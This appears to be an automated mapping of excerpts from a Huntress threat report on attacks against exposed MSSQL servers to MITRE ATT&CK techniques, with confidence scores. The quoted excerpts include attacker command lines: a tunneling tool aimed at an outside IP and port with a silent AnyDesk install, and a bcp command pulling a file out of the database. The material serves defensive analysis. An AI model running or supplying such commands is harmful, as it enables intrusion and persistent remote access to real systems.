“translates the Turkish phrase “yeni kullanıcı hesabı olusturuldu” to “new user account created” in English. Further, the words “sifre” and “isim” also appear to be Turkish, and translate to “password” and “name”, respectively. The contents of the second script file, u…”
T1059.001 PowerShell
91%
“launch a tunneling tool and AnyDesk: c:\users\public\music\4.exe --ip "2.57.149[.]233" --port "3377" --install c:\users\public\music\ad.exe --install c:\"program files (x86)"\ --silent net start "remote desktop configuration manage…”
T1059.003 Windows Command Shell
83%
“of what’s usually observed when an MSSQL server has been compromised; specifically, the use of the MSSQL native bulk copy command to extract a file from the database, as illustrated in the following command line: cmd /c bcp "select binarytable from ugnzbdzbsi" queryout "c…”
T1136.001 Local Account
81%
“each of the scripts ended in a line that deleted the file itself, and at the time that the incident was being investigated, each of the script files were found within the file system of the endpoint. Again, there were two script files that each created a user account. The content…”
T1505.001 SQL Stored Procedures
68%
“Attacking MSSQL Servers | Huntress. Ever since the SQL Slammer worm of 2003, and even before then, MSSQL database servers exposed to the internet with default configurations have been targeted, and in many cases, exploited. More recently, Securonix shared a threat research securit…”
T1059.003 Windows Command Shell
42%
“Attacking MSSQL Servers | Huntress. Ever since the SQL Slammer worm of 2003, and even before then, MSSQL database servers exposed to the internet with default configurations have been targeted, and in many cases, exploited. More recently, Securonix shared a threat research securit…”
Summary
In addition to social engineering attacks, threat actors target organizations' attack surface, looking for exposed services and applications to gain access into an infrastructure. Microsoft SQL database servers have long been a target for attackers.